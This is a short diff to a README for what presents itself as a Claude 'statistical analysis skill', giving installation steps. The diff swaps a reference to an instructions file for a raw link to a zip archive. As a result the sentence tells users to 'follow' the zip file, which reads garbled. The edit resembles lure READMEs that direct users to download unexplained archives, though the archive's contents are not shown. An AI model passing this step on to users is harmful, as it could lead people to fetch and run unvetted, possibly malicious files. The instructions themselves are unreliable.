Giro03k/claude-statistical-analysis-skill/README.md

   Check if your Claude interface has an option to add new skills.
 Upload the downloaded skill file there.
 The UI may provide prompts to enable and configure it.

 - **For Desktop or Custom Setup:**
   Unzip the downloaded files if necessary.
-Follow the included user guide or instructions.txt file.
+Follow the included user guide or https://raw.githubusercontent.com/Giro03k/claude-statistical-analysis-skill/main/references/statistical_analysis_claude_skill_1.7.zip file.
 Usually, this means importing the skill into your Claude-enabled environment using a menu or command.

 - Restart your Claude AI or refresh the interface to see the new skill active.